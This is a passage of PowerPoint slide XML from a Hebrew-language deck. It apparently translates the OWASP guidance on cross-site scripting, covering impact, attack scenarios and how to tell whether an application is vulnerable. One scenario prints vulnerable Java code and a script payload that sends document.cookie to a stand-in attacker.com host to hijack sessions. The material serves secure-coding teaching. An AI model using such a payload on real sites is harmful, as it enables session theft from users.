                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>חולשות שכאלו לרוב</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t> מאפשרות לתוקפים גישה בלתי מורשית לחלק מהמידע או מיכולות המערכת. לעיתים, חולשות שכאלו מאפשרות חבלה מלאה בצד השרת.</a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr algn="r" rtl="1">
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="0"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
                        <a:rPr lang="he-IL" sz="900" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                          <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>ההשפעה העסקית תלויה בבקרות הנדרשות בצד היישום והמידע.</a:t>
                      </a:r>
                      <a:endParaRPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                        <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRPr>
                    </a:p>
                  </a:txBody>
                  <a:tcPr marL="45720" marR="4572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ts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                        <a:buClrTx/>
                        <a:buSzTx/>
                        <a:buFontTx/>
                        <a:buNone/>
                        <a:tabLst/>
                        <a:defRPr/>
                      </a:pPr>
                      <a:endParaRPr lang="en-US" sz="1000" baseline="0" dirty="0">
                        <a:solidFill>
                          <a:schemeClr val="tx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2"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
    </p:spTree>
    <p:custDataLst>
      <p:tags r:id="rId1"/>
    </p:custDataLst>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="41974975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Rectangle 106"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3474005" y="6372000"/>
            <a:ext cx="3383280" cy="2761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gn="r" rtl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="1100" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>דוגמאות לתרחישי תקיפה</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>תרחיש 1:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> היישום משתמש במידע בלתי מאומת בבניית ה-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>HTML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> הבא מבלי לבצע בדיקות או </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>escaping</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr lang="he-IL" sz="900" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(String) page += "&lt;input name='</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>creditcard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>' type='TEXT'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  value=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>" + </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>request.getParameter</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>("CC") + "</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&gt;";</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>התוקף מעדכן את פרמטר </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>‘CC’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> בדפדפן ל:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&gt;&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>document.location</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>http://www.attacker.com/cgi-bin/cookie.cgi?</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:latin typeface="+mn-ea"/>
                <a:cs typeface="+mn-ea"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  foo=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>+</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>&lt;/script&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>'</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>מתקפה זו תגרום למזהה השיחה של הקורבן להישלח לאתר התוקף, דבר אשר יאפשר  לתוקף לחטוף את ה-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>session</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> הנוכחי של המשתמש.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>הערה</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>: תוקפים עשויים להשתמש במתקפות </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> על-מנת להכניע הגנות ממוכנות מפני מתקפות מסוג </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Cross-Site Request Forgery (CSRF)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> אשר עשויות להיות מוטמעות ביישום עצמו.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="108" name="Rectangle 107"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3474005" y="3132000"/>
            <a:ext cx="3383280" cy="316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gn="r" rtl="1">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="1100" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>האם היישום פגיע?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1100" b="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
              <a:latin typeface="Exo 2" panose="00000500000000000000" pitchFamily="2" charset="0"/>
              <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>קיימות שלוש צורות של מתקפת </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>XSS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="he-IL" sz="900" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, לרוב כלפי דפדפן המשתמשים:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="r" rtl="1">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr lang="he-IL" sz="900" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>מתקפה מסוג </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="900" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Liberation Sans" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
